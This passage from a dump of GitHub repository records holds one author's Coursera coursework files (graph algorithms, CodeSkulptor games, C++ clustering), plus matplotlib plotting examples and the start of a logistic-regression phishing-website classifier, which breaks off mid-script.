\"\"\"\n Uses the DPA algorithm provided in Q3 of the Application\n to generates a random directed graph iteratively, where\n each iteration a new node is created, added to the graph,\n and connected to the subset of the existing node\n\n Arguments:\n n_nodes {integer} -- final number of nodes in the generated graph\n m_nodes {integer} -- number of existing nodes to which a new node is connected\n during each iteration\n\n Returns:\n dictionary -- the generated graph based on DPA algorithm\n \"\"\"\n\n # create a complete graph of m_nodes noes\n graph = alg_proj1_sol.make_complete_graph(m_num_nodes)\n\n # create the DPA trial object corresponding to complete graph\n dpa_trial = dpa.DPATrial(m_num_nodes)\n\n # add each new ode to m_nodes from the existing graph randomly\n # chosen with probability:\n # (in-degree of new_node + 1) / (in-degree of all nodes +\n # total number of existing nodes)\n # simulated by the run_trial of the DPATrial class\n for new_node in range(m_num_nodes, n_num_nodes):\n # randomly select m_nodes from the existing graph that\n # the new_node will be connected to. Remove if any\n # duplicate nodes in the m_nodes selected\n new_node_neighbors = dpa_trial.run_trial(m_num_nodes)\n\n # update the existing graph to add this new node and its\n # neighbors\n graph[new_node] = new_node_neighbors\n\n\n return graph\n\n# create the graph using the DPA algorithm\ndpa_graph = alg_dpa(n_nodes, m_nodes)\n\n# get the in-degree distribution for the DPA graph\nin_deg_dist_dpa = alg_proj1_sol.in_degree_distribution(dpa_graph)\n\n# normalize the in degree distribution for the DPA graph\nsum_val = sum(in_deg_dist_dpa.values())\nin_deg_dist_dpa.update((degree, freq / float(sum_val)) for degree, freq in in_deg_dist_dpa.items())\n\n# draw the loglog plot of the normalized in-degree distribution of the DPA graph\nplt.figure(1)\nplt.loglog(in_deg_dist_dpa.keys(), in_deg_dist_dpa.values(), basex=10, basey=10,\n linestyle='None', marker='.', markeredgecolor='blue')\nplt.title('loglog plot of In-degree distribution of DPA graph')\nplt.xlabel('in-degree')\nplt.ylabel('fraction of nodes')\nplt.ylim(None, 1)\nplt.grid()\nplt.show()\n#plt.savefig(\"Q4_loglog_indegree_dist_dpa.png\")\n\n##### Q5 Solution #####\n# In this last problem, we will compare the in-degree distribution for the citation graph\n# to the in-degree distribution for the DPA graph as constructed in Question 4. In\n# particular, we will consider whether the shape of these two distributions are similar\n# and, if they are similar, what might be the cause of the similarity.\n#\n# To help you in your analysis, you should consider the following three phenomena:\n# - The \"six degrees of separation\" phenomenon,\n# - The \"rich gets richer\" phenomenon, and\n# - The \"Hierarchical structure of networks\" phenomenon.\n#\n# Your task for this problem is to consider how one of these phenomena might explain\n# the structure of the citation graph or, alternatively, how the citations patterns\n# follow one of these phenomena.\n#\n# When answering this question, please include answers to the following:\n#\n# Q5.1: Is the plot of the in-degree distribution for the DPA graph similar to that of the\n# citation graph? Provide a short explanation of the similarities or differences.\n# Focus on the various properties of the two plots as discussed in the class page on\n# \"Creating, formatting, and comparing plots\".\n\n# Ans: Yes they are similar since both follow a linear log-log decreasing trend i.e\n# they both follow the power law distribution and the point are spread out more\n# as the in-degree increases\n\n# Q5.2: Which one of the three social phenomena listed above mimics the behavior of the DPA\n# process? Provide a short explanation for your answer.\n\n# Ans: DPA process mimics the \"rich get richer\" or the \"preferential attachment\" phenomena\n# since every new node that is added to the graph is most likely to be connected to\n# the neighbor with highest in-degree.\n\n# Q5.3: Could one of these phenomena explain the structure of the physics citation graph?\n# Provide a short explanation for your answer.\n\n# Ans: The citation graph also mimics the \"rich get richer\" phenomena as the paper with\n# higher citations i.e higher degree tend to be more likely used in other papers\n# as well due to being more visible\n"
},
{
"alpha_fraction": 0.7905405163764954,
"alphanum_fraction": 0.7932432293891907,
"avg_line_length": 226.76922607421875,
"blob_id": "7e1955526a1db5bea2aceb4137df8e082ef63747",
"content_id": "ca987dd380bfc96baa5f329bdfe91ee9ff54b374",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2960,
"license_type": "no_license",
"max_line_length": 802,
"num_lines": 13,
"path": "/Fundamentals of Computing Specialization/Principles of Computing (Part 2)/Mini-Project1 Zombie Apocalypse/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #1 Zombie Apocalypse\n\nDeveloped a simulation of zombies and humans interacting on a grid in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To see the simulation in action, click [here](http://www.codeskulptor.org/#user46_uQfN1iv6Qq_0.py) and press the play button on the top left corner. A window will pop up. Click on the Add button on the left to either add human, zombies or obstacles to the screen on the right and click on the screen to add them on desired location. Black block represents obstacles, green ones represent humans, and red blocks represent zombies. To see how zombie would attack humans or how humans will flee zombie press the \"Zombies stalk\" or \"Humans flee\" buttons\n\nMini-project overview taken from course page can be found below:\n* In this mini-project, we will create a simulation of zombies and humans interacting on a grid. As in the movies, our zombies are hungry for human brains. As a result, zombies chase humans and humans flee from zombies. To keep our simulation manageable, the positions of the zombies and humans will be restricted to a grid. In our simulation, zombies are not very agile and can only move up, down, left or right in one step of the simulation. On the other hand, humans are more agile and can move in these four directions as well as the four neighboring diagonal directions. If a zombie catches a human by positioning itself in the same cell, the zombie enjoys some delicious human brains. Being a Computer Scientist, the human has plenty of brains to spare and continues to live on in our simulation.\n\n* To enhance the realism of our simulation, some of the cells in this grid will be marked as impassable and restrict zombie/human movement so that they can not move through these cells. Our task in this simulation is to implement an **Apocalypse** class that encapsulates the core mechanisms of this simulation and that interacts with a GUI that we have created for visualizing the simulation in CodeSkulptor. This **Apocalypse** class is a sub-class of the **Grid** class and inherits the **Grid** class methods. Passable cells in the grid correspond to **EMPTY** cells while **FULL** cells are impassable. Humans and zombies can only inhabit passable cells of the grid. However, several humans and zombies may inhabit the same grid cell.\n\n* This **Apocalypse** class also includes two lists, one for zombies and one for humans. Note that the entries in each list are cell indices of the form **(row,col)** that represent the position of zombies/humans in the grid. Each step in the simulation will either update the positions of the zombies based on the state of the grid and the position of the humans or update the positions of the humans based on the state of the grid and the position of the zombies.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/principles-of-computing-2/supplement/3VwCE/mini-project-description>"
},
{
"alpha_fraction": 0.7721201777458191,
"alphanum_fraction": 0.7813021540641785,
"avg_line_length": 148.5,
"blob_id": "523ad53cf68c64bb7d4667eddad9d1bdefeee462",
"content_id": "4fa19390977a0cd516bc137d16ab7c8b5d9878d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1198,
"license_type": "no_license",
"max_line_length": 488,
"num_lines": 8,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 1)/Mini-Project4 Pong/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Mini-project #4 - Pong\n\nImplemented a simple pong game in CodeSkulptor, a browser-based Python interpreter, as part of the coursework. To play the game go [here](http://www.codeskulptor.org/#user46_oYvhasFKzo_1.py) and press the play button on the top left corner. To control the pong pad, use the up and down arrow keys for the right player and \"w\" and \"s\" keys for the left player. As the game progresses without any player losing a point, the speed of the ball will increase to make the game more fun to play.\n\nMini-project overview taken from course page can be found below:\n* \"In this project, we will build a version of Pong, one of the first arcade video games (1972). While Pong is not particularly exciting compared to today's video games, Pong is relatively simple to build and provides a nice opportunity to work on the skills that you will need to build a game like Asteroids. As usual, we have provided a [program template](http://www.codeskulptor.org/#examples-pong_template.py) that can be used to guide your development of Pong.\"\n\nComplete mini-project description can be found at: <https://www.coursera.org/learn/interactive-python-1/supplement/wiv24/mini-project-description>\n\n\n"
},
{
"alpha_fraction": 0.6025364995002747,
"alphanum_fraction": 0.6275424957275391,
"avg_line_length": 29.07063102722168,
"blob_id": "c7e9b818171241b81e1735ebf271f7f858e36d02",
"content_id": "555fb8f5bbad78dedc2ceaa1bc1c1ae7825b958d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8372,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 269,
"path": "/Algorithms on Graphs/Assignment5/clustering.cpp",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "// file: clustering.cpp\r\n// author: Shamsuddin Rehmani\r\n// date: 2016-07-24\r\n// description: Problem 2 of the fifth assignment of Algorithms on Graphs\r\n//\t\t\t\tby University of California, San Diego & Higher School of Economics on Coursera\r\n//\r\n// The task was: Given n points on a plane and an integer k, compute the largest possible value \r\n//\t\t\t\tof d such that the given points can be partitioned into k non - empty subsets in such a way \r\n//\t\t\t\tthat the distance between any two points from different subsets is at least d\r\n//\r\n//\t\t\t\tInput Format. The first line contains the number n of points. Each of the following n lines \r\n//\t\t\t\tdefines a point (xi, yi). The last line contains the number k of clusters\r\n//\r\n//\t\t\t\tOutput: Output the largest value of d. The absolute value of the difference\r\n//\t\t\t\tbetween the answer of this program and the optimal value is at most 10e−6\r\n//\r\n// \r\n//\t\t\t\tStarter file with main function was already provided\r\n//\t\t\t\t\r\n//\t\t\t\tThe file passed all test cases on Coursera with\r\n//\t\t\t\tmax time used: 0.02/2.00 sec, max memory used: 8.6/512 MB. \r\n\r\n#include <algorithm>\r\n#include <iostream>\r\n#include <iomanip>\r\n#include <cassert>\r\n#include <vector>\r\n#include <cmath>\r\n#include <numeric> \r\n\r\n#define edge pair<int,int>\r\n\r\nusing std::vector;\r\nusing std::pair;\r\n\r\n// sort pairs of edge and their weight based on the the weights\r\nstruct sort_pairs {\r\n\tbool operator()(const std::pair<edge, double> &left, const std::pair<edge, double> &right) {\r\n\t\treturn left.second < right.second;\r\n\t}\r\n};\r\n\r\n/*\r\n// The root, weighted_union, and find functions are for the disjoint data structure used in\r\n// kruskal's agorithm which is implemented to solve the clustering problem.\r\n// Source:https://www.hackerearth.com/notes/disjoint-set-union-union-find/\r\n*/\r\n\r\n// Return the root node of u\r\n// \r\n// PRE: nodes are not forming a cycle\r\n// POST: return the root node\r\n// PARAM: parent = vector with indexes as nodes and their values as the node's parents\r\n//\t\t u = a node for which are finding its root node\r\nint root(vector<int> &parents, int u)\r\n{\r\n\t//while parent of us is not u i.e u is not root\r\n\twhile (parents[u] != u)\r\n\t{\r\n\t\tparents[u] = parents[parents[u]]; // set parent of u as it grandparent (path compression)\r\n\t\tu = parents[u]; \r\n\t}\r\n\treturn u;\r\n}\r\n\r\n// Performs a union of two different sets based on their size\r\n// \r\n// PRE: root of u and root of v are not the same i.e u and v belong to different sets.\r\n//\t\tsize of all nodes are 1 since each node makes up a set with root node being itself\r\n// POST: updates the parent for the root node of the set with smaller size to\r\n//\t\t the root of the larger set. Updates the set size accordingly\r\n// PARAM: parent = vector with indexes as nodes and their values as the node's parents\r\n//\t\t size = vector with size of each set.\r\n//\t\t u = a node in a set\r\n//\t\t v = a node in a different set\r\nvoid weighted_union(vector<int> &parents, vector<int> &size, int u, int v) {\r\n\r\n\tint rootOfu = root(parents,u);\r\n\tint rootOfv = root(parents,v);\r\n\r\n\t//if set with node u is smaller than the set with node v\r\n\tif (size[rootOfu] < size[rootOfv]) {\r\n\t\t//update the parent of root node of the set with u to root node of the set with v\r\n\t\tparents[rootOfu] = parents[rootOfv];\r\n\t\t//update the size of set with v\r\n\t\tsize[rootOfv] += size[rootOfu];\r\n\t}\r\n\t// do the oposite\r\n\telse {\r\n\t\tparents[rootOfv] = parents[rootOfu];\r\n\t\tsize[rootOfu] += size[rootOfv];\r\n\t}\r\n\r\n}\r\n\r\n// Finds whether two nodes belong to the same set by finding their root node\r\n// \r\n// PRE: \r\n// POST: returns true if two nodes u and v belong to the same set, false otherwise\r\n// PARAM: parent = vector with indexes as nodes and their values as the node's parents\r\n//\t\t u = a node in a set\r\n//\t\t v = a node in a different set\r\nbool find(vector<int> &parents,int u, int v)\r\n{\r\n\tif (root(parents,u) == root(parents,v)) \r\n\t\treturn true;\r\n\telse\r\n\t\treturn false;\r\n}\r\n\r\n// Uses Kruskal's algorithm to find the the largest possible value of d such that the given points\r\n// can be partitioned into k non - empty subsets in such a way that the distance between any two \r\n// points from different subsets is at least d\r\n// \r\n// PRE: 2 ≤ k ≤ n ≤ 200; 10e-3 ≤ xi,yi ≤ 10e3 are all integers; All points (xi, yi) are pairwise different, \r\n//\t\t(note xi and yi is ths same as value at x[i] and y[i], x.size() = y.size = n = No. of points) \r\n// POST: return the value d as decribed above\r\n// PARAM: x = vector with all the x cordinate values of the points\r\n//\t\t y = vector with all the y cordinate values of the points\r\n//\t\t k = number of partitions to be made to the cluster of points\r\n\r\ndouble clustering(vector<int> x, vector<int> y, int k) {\r\n\r\n\t//create a parent vector used for disjoint datastructure\r\n\tvector<int> parents(x.size()); \r\n\t//update the parent vector with consecutive values from 0 to size-1\r\n\t//since initially all nodes/points are parent of itself\r\n\tstd::iota(parents.begin(), parents.end(), 0); \r\n\t//set the size of each set as 1\r\n\tvector<int> size(x.size(), 1);\r\n\t//intialize the vector of pairs of edges and their weight. Each edge contains\r\n\t//two points and the distance between them is their weight. Each point can be\r\n\t//connected to n-1 other points. Thus n point can be connected n*(n-1) points\r\n\t//which is the total number possible egde combinations\r\n\tvector < pair<edge, double> > edgeWeight(x.size()*(x.size()-1));\r\n\tedge anEdge;\r\n\tdouble weight;\r\n\tint v1;\r\n\tint v2;\r\n\tint counter = 0;\r\n\r\n\t/*\r\n\t//the for loop code block updated the weight of every possible edge combinations\r\n\t//between a pair of points except for the point connecting to itself (no edge to itself)\r\n\t*/\r\n\tfor (int u = 0; u < x.size(); u++) {\r\n\r\n\t\tfor (int v = 0; v < y.size(); v++) {\r\n\t\t\tif (u != v) {\r\n\t\t\t\t//find the distance between two points\r\n\t\t\t\tweight = sqrt(pow((x[u] - x[v]), 2) + pow((y[u] - y[v]), 2));\r\n\t\t\t\tanEdge.first = u;\r\n\t\t\t\tanEdge.second = v;\r\n\t\t\t\tedgeWeight.push_back(std::make_pair(anEdge,weight));\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t//sort egdes bases on their edge weight. Note that we will have duplicate\r\n\t//edge weights since edge from u to v will have same distance as an edge\r\n\t//from v to u\r\n\tstd::sort(edgeWeight.begin(), edgeWeight.end(), sort_pairs());\r\n\r\n\t//for all possible egdes\r\n\tfor (int i = 0; i < edgeWeight.size(); i++) {\r\n\t\t//get the points forming an egde with the next smallest weight\r\n\t\tv1 = edgeWeight[i].first.first;\r\n\t\tv2 = edgeWeight[i].first.second;\r\n\t\t//if these points/nodes do not belong to the same set i.e. they have different parents\r\n\t\tif (find(parents, v1, v2) == false) {\r\n\r\n\t\t\t//merge the two sets with v1 and v2 respectively\r\n\t\t\tweighted_union(parents, size, v1, v2);\r\n\t\t\t//update the number of edges selected for kruskal's algorithm\r\n\t\t\t++counter;\r\n\t\t}\r\n\t\t//the (n-(k-1))th edge will have the weight equal to d since this is the smallest distance\r\n\t\t//that connected two points in different partitions/clusters\r\n\t\tif (counter == (x.size() - k + 1))\r\n\t\t\treturn edgeWeight[i].second;\r\n\t}\r\n\r\n}\r\n\r\nint main() {\r\n\t\r\n\tsize_t n;\r\n\tint k;\r\n\tstd::cin >> n;\r\n\tvector<int> x(n), y(n);\r\n\tfor (size_t i = 0; i < n; i++) {\r\n\t\tstd::cin >> x[i] >> y[i];\r\n\t}\r\n\tstd::cin >> k;\r\n\tstd::cout << std::setprecision(10) << clustering(x, y, k) << std::endl;\r\n\r\n\t// A test case to check if the clustering function works. These are commented since the \r\n\t// assignment requires the clustering.cpp file to read input values and output the respective\r\n\t// results on the console\r\n\t/************************************************************************************************************\r\n\t\r\n\t/*\r\n\tvector<int> x1(12), y1(12);\r\n\tx1[0] = 7;\r\n\ty1[0] = 6;\r\n\r\n\tx1[1] = 4;\r\n\ty1[1] = 3;\r\n\r\n\tx1[2] = 5;\r\n\ty1[2] = 1;\r\n\r\n\tx1[3] = 1;\r\n\ty1[3] = 7;\r\n\r\n\tx1[4] = 2;\r\n\ty1[4] = 7;\r\n\r\n\tx1[5] = 5;\r\n\ty1[5] = 7;\r\n\r\n\tx1[6] = 3;\r\n\ty1[6] = 3;\r\n\r\n\tx1[7] = 7;\r\n\ty1[7] = 8;\r\n\r\n\tx1[8] = 2;\r\n\ty1[8] = 8;\r\n\r\n\tx1[9] = 4;\r\n\ty1[9] = 4;\r\n\r\n\tx1[10] = 6;\r\n\ty1[10] = 7;\r\n\r\n\tx1[11] = 2;\r\n\ty1[11] = 6;\r\n\r\n\tstd::cout << std::setprecision(10) << clustering(x1, y1, 3) << std::endl;\r\n\r\n\tvector<int> x2(8), y2(8);\r\n\tx2[0] = 3;\r\n\ty2[0] = 1;\r\n\r\n\tx2[1] = 1;\r\n\ty2[1] = 2;\r\n\r\n\tx2[2] = 4;\r\n\ty2[2] = 6;\r\n\r\n\tx2[3] = 9;\r\n\ty2[3] = 8;\r\n\r\n\tx2[4] = 9;\r\n\ty2[4] = 9;\r\n\r\n\tx2[5] = 8;\r\n\ty2[5] = 9;\r\n\r\n\tx2[6] = 3;\r\n\ty2[6] = 11;\r\n\r\n\tx2[7] = 4;\r\n\ty2[7] = 12;\r\n\r\n\tstd::cout << std::setprecision(10) << clustering(x2, y2, 4) << std::endl;\r\n\r\n\t*/\r\n}\r\n"
},
{
"alpha_fraction": 0.5305091142654419,
"alphanum_fraction": 0.5507190227508545,
"avg_line_length": 28.918603897094727,
"blob_id": "ab9cfe59bde4ea1d6f426052f1e37749e6309ebc",
"content_id": "d10137aefc261289ebd2b8602de1d28de3cb9aff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2573,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 86,
"path": "/Fundamentals of Computing Specialization/Interactive Programming in Python (Part 2)/Mini-Project5 Memory/memory.py",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# implementation of card game - Memory\n\nimport simplegui\nimport random\n\ndeck_of_cards = []\nexposed_cards = []\nSIZE_OF_DECK = 16\nCARD_WIDTH = 50\nCARD_HEIGHT = 100\nTXT_SIZE = 50\nidx_card1 = 0\nidx_card2 = 0\nstate = 0\ntot_turns = 0\n\n# helper function to initialize globals\ndef new_game():\n global deck_of_cards, exposed_cards, state, tot_turns\n state = 0\n tot_turns = 0\n deck_of_cards = range(SIZE_OF_DECK/2)+ range(SIZE_OF_DECK/2)\n random.shuffle(deck_of_cards)\n exposed_cards = [False]*SIZE_OF_DECK\n label.set_text(\"Turns = \" + str(tot_turns))\n \n \n# define event handlers\ndef mouseclick(pos):\n global exposed_cards, state, idx_card1, idx_card2, tot_turns\n \n curr_exposed_idx = pos[0] // CARD_WIDTH\n \n if not exposed_cards[curr_exposed_idx]:\n if state == 0:\n state = 1\n exposed_cards[curr_exposed_idx] = True\n idx_card1 = curr_exposed_idx\n elif state == 1:\n state = 2\n exposed_cards[curr_exposed_idx] = True\n idx_card2 = curr_exposed_idx\n tot_turns += 1\n elif state == 2:\n if (deck_of_cards[idx_card1] != deck_of_cards[idx_card2]):\n exposed_cards[idx_card1] = False\n exposed_cards[idx_card2] = False\n\n exposed_cards[curr_exposed_idx] = True\n idx_card1 = curr_exposed_idx\n state = 1\n \n label.set_text(\"Turns = \" + str(tot_turns))\n \n# cards are logically 50x100 pixels in size \ndef draw(canvas):\n i = 0\n for num, is_exposed in zip(deck_of_cards, exposed_cards):\n txt_size = frame.get_canvas_textwidth(str(num), TXT_SIZE)\n if (is_exposed):\n canvas.draw_text(str(num), (txt_size/2 +CARD_WIDTH*i, \n CARD_HEIGHT/2 + TXT_SIZE/2),\n TXT_SIZE, 'white')\n else:\n canvas.draw_polygon([(CARD_WIDTH * i, 0), \n (CARD_WIDTH * i, CARD_HEIGHT), \n (CARD_WIDTH * (i+1), CARD_HEIGHT),\n (CARD_WIDTH * (i+1) , 0)], 1,\n 'gold', 'green')\n i+=1\n \n\n\n# create frame and add a button and labels\nframe = simplegui.create_frame(\"Memory\", CARD_WIDTH * SIZE_OF_DECK, CARD_HEIGHT)\nframe.add_button(\"Reset\", new_game)\nlabel = frame.add_label(\"Turns = 0\")\n\n\n# register event handlers\nframe.set_mouseclick_handler(mouseclick)\nframe.set_draw_handler(draw)\n\n# get things rolling\nnew_game()\nframe.start()\n"
},
{
"alpha_fraction": 0.7981157302856445,
"alphanum_fraction": 0.8061911463737488,
"avg_line_length": 122.88888549804688,
"blob_id": "76b9f891deeb6144f64d53be164da5af124850cb",
"content_id": "2f64056397b4b3c81ae9efe89b517bafb7aafe0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2229,
"license_type": "no_license",
"max_line_length": 566,
"num_lines": 18,
"path": "/Fundamentals of Computing Specialization/Algorithmic Thinking (Part 1)/Module 1/README.md",
"repo_name": "rehmanis/Coursera",
"src_encoding": "UTF-8",
"text": "# Project and Application Overviews\n## Project #1: Degree Distribution for Graphs\n\n* For your first project, you will write Python code that creates dictionaries corresponding to some simple examples of graphs. You will also implement two short functions that compute information about the distribution of the in-degrees for nodes in these graphs. You will then use these functions in the Application component of Module 1 where you will analyze the degree distribution of a citation graph for a collection of physics papers. This final portion of module will be peer assessed.\n\n* We will use Python 2 in this class since OwlTest (the machine grader) supports Python 2. For more information on recommended Python IDEs, please consult this class page. Note that this portion of the module should be simple for experienced Python programmers. If you find it challenging, your Python skills may not be sufficient to be successful in this class.\n\nComplete project description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-1/supplement/hw1o3/project-1-description>\n\n## Application #1: Analysis of Citation Graphs\n\n* In the Module 1 Application, we will combine the mathematical analysis that we began in the Homework with the code that you have written in the Project to analyze a real-world problem: How do scientific papers get cited? This part of the module will probably be much more unstructured than you are accustomed to in an on-line class. Our goal is to provide a more realistic simulation of how the concepts that you are learning are actually used in practice. Your key task in this part of the module is to think about the problem at hand as you answer each question.\n\n* As part of this portion of the module, you'll need to write code that processes medium-sized datasets. You are welcome to use either desktop Python or CodeSkulptor when writing this code. To process the data in CodeSkulptor, you will need to be careful in how you implement your code and will probably need to increase the default timeout from 5 secs to around 20-30 secs.\n\nComplete application description can be found at : \n<https://www.coursera.org/learn/algorithmic-thinking-1/supplement/i4zaL/application-1-description>"
}
] | 62 |
MarcGershow/python-plotting-examples-lecture-4 | https://github.com/MarcGershow/python-plotting-examples-lecture-4 | 4adf0a9ede90314d9cbcdfb914e961b4347c2760 | c60cbe39a37921a3d766f89394b86eb10858c85e | 029a44485e7c252f4d82c924d2d898d7f0d1c54c | refs/heads/master | 2020-03-31T15:45:32.058418 | 2018-10-10T02:45:58 | 2018-10-10T02:45:58 | 152,350,250 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6735848784446716,
"alphanum_fraction": 0.7004716992378235,
"avg_line_length": 23.34482765197754,
"blob_id": "6702cfb936620ff3b39631162095eaff0058721a",
"content_id": "d44b546646c06ec300d4347d27b9a796c31823cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2120,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 87,
"path": "/plotting examples.py",
"repo_name": "MarcGershow/python-plotting-examples-lecture-4",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 8 16:01:27 2018\n\n@author: gershow\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\"\"\"\nplot sin and cosine over a 2 pi period\nadd a title and legend\n\"\"\"\nplt.figure(1)\nplt.clf()\nt = np.linspace(0,2*np.pi,100)\nx = np.sin(t)\nl1 = plt.plot(t,x, 'b-', label = 'sin')\n\ny = np.cos(t)\nl2 = plt.plot(t,y, 'g*-', label = 'cosine')\n\nplt.legend()\nplt.title(\"Sines and Cosines\")\nplt.xlabel(\"t\")\n\n\"\"\"\nplot a red circle of radius 1\n\"\"\"\n\nplt.figure(2)\nplt.plot(x,y,'r-')\nplt.title (\"my circle looks like an ellipse because the axes aren't scaled equally\")\nplt.show();\n\n\n\"\"\"\nplot a red circle of radius 1\nthat doesn't look like an ellipse\n\"\"\"\n\nplt.figure(3)\nplt.plot(x,y,'r-')\nplt.title ('axes equally scaled')\nax = plt.gca() #gca = \"get current axes\"\nax.axis('equal') #set x-axis and y-axis to be equally scaled\nplt.show();\n\n\"\"\"\nplots adjusted approval polls for donald trump\nas collected and adjusted by fivethirtyeight\n\"\"\"\nmydata = np.loadtxt('polls.txt');\nday = mydata[:,0]\napprove = mydata[:,1]\ndisapprove = mydata[:,2]\nelectionday = 43410 #nov 6 2018 in microsoft date code\n\nplt.figure(4)\nplt.clf()\nplt.plot(electionday-day, approve, 'ro', markersize = 1, label = 'approve')\nplt.plot(electionday-day, disapprove, 'bo', markersize = 1, label = 'disapprove')\nax = plt.gca()\nax.invert_xaxis()\nplt.xlabel('days until midterm election')\nplt.ylabel('approval')\nplt.title('fivethirtyeight collected and adjusted approval polls')\nplt.legend()\n\n\"\"\"\nmakes a histogram of approval and disapproval polls from above\ndivides by total number of samples to get a normalized distribution\n\"\"\"\nplt.figure(5)\nplt.clf()\nbinedges = np.arange(25,76)\nhapp,_binedges = np.histogram(approve,binedges) #_binedges means ignore this output\nhdis,_binedges = np.histogram(disapprove,binedges)\nbins = np.arange(25,75)\nplt.bar(bins, happ/np.sum(happ), width=1, color='r', label='approve')\nplt.bar(bins, hdis/np.sum(hdis), width=1, color='b', label='disapprove')\nplt.xlabel('adjusted poll value')\nplt.ylabel('fraction of polls')\nplt.title('all polls since january 2017')\nplt.legend()\n\n\n"
},
{
"alpha_fraction": 0.7916666865348816,
"alphanum_fraction": 0.8194444179534912,
"avg_line_length": 35,
"blob_id": "cc701309ad4a53baf68102462721b50b842560ee",
"content_id": "6715ab002cad6474140e28b036c84c09ee431719",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 144,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 4,
"path": "/README.md",
"repo_name": "MarcGershow/python-plotting-examples-lecture-4",
"src_encoding": "UTF-8",
"text": "# python-plotting-examples-lecture-4\n\npolls are from the 538 dataset\nhttps://github.com/fivethirtyeight/data/tree/master/trump-approval-ratings\n"
}
] | 2 |
srikanthiremath/Phishing-Detector-using-LR | https://github.com/srikanthiremath/Phishing-Detector-using-LR | c975735567bf091bd7c1d5d645c3f4b0196ea50c | 3edad78aa3e656ae10f80098a11fa0d9c573c5a6 | c9d90075404dd97c83d1245380e257578a7c8b68 | refs/heads/master | 2020-05-15T13:15:43.772609 | 2019-04-19T16:21:37 | 2019-04-19T16:21:37 | 182,292,917 | 4 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6594439744949341,
"alphanum_fraction": 0.6927636861801147,
"avg_line_length": 29.172840118408203,
"blob_id": "aec33441dace3ede27955c4cdf03fe57b285b696",
"content_id": "8c0cba91c533f92c5285a9026cc409f4fa22ffcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4892,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 162,
"path": "/lrphishing.py",
"repo_name": "srikanthiremath/Phishing-Detector-using-LR",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 25 18:18:55 2018\n\n@author: SRIKANT\n\"\"\"\n#import packages\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#load Dataset and classify as features and label\nphishingData = pd.read_csv('phishing.txt')\nX = phishingData.iloc[:,:-1].values\ny = phishingData.iloc[:,30].values\n\n#split features and label into training ang testing data\nfrom sklearn.cross_validation import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.3,random_state=4)\n\n#perform feature scaling\nfrom sklearn.preprocessing import StandardScaler\nscalar = StandardScaler()\nX_train = scalar.fit_transform (X_train)\nX_test = scalar.fit_transform (X_test) \n\n#Logistic Regression Classifier \nfrom sklearn.linear_model import LogisticRegression\nLRclassifier = LogisticRegression(C=100,random_state=0)\nLRclassifier.fit(X_train,y_train)\n\nLRpredict = LRclassifier.predict(X_test)\n\n#LRC training score\nLRclassifier.score(X_train,y_train)\n\n#LRC test score\nLRclassifier.score(X_test,y_test)\n\n#confusion matrix for printing count of misclassified samples in the test data prediction\nfrom sklearn.metrics import confusion_matrix\nconfusionMatrix = confusion_matrix(y_test,LRpredict)\n\n\n\n#=================================================================================================\n\n\n# classify as features(Prefix_Suffix and URL_of_Anchor) and label with index 5\nX = phishingData.iloc[0:5,[6,14]].values\ny = phishingData.iloc[0:5,30].values\n\n#split features and label into training ang testing data\nfrom sklearn.cross_validation import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(X,y,test_size=0.3,random_state=4)\n\n#perform feature scaling\nfrom sklearn.preprocessing import StandardScaler\nscalar = StandardScaler()\nX_train = scalar.fit_transform (X_train)\nX_test = scalar.fit_transform (X_test) \n\n#Logistic Regression Classifier \nfrom sklearn.linear_model import LogisticRegression\nLRclassifier1 = LogisticRegression(C=100,random_state=0)\nLRclassifier1.fit(X_train,y_train)\n\n\nLRpredict1 = LRclassifier1.predict(X_test)\n\n#LRC training score\nLRclassifier1.score(X_train,y_train)\n\n#LRC test score\nLRclassifier1.score(X_test,y_test)\n\n#confusion matrix for printing count of misclassified samples in the test data prediction\nfrom sklearn.metrics import confusion_matrix\nLRconfusionMatrix1 = confusion_matrix(y_test,LRpredict1)\n\n#visualize the Test set\nxx, yy = np.mgrid[-5:5:.01, -5:5:.01]\ngrid = np.c_[xx.ravel(), yy.ravel()]\nprobs = LRclassifier1.predict_proba(grid)[:, 1].reshape(xx.shape)\n\nprint(probs)\n\nf, ax = plt.subplots(figsize=(8, 6))\ncontour = ax.contourf(xx, yy, probs, 25, cmap=\"RdBu\",\n vmin=0, vmax=1)\nax_c = f.colorbar(contour)\nax_c.set_label(\"$P(y = 1)$\")\nax_c.set_ticks([0, .25, .5, 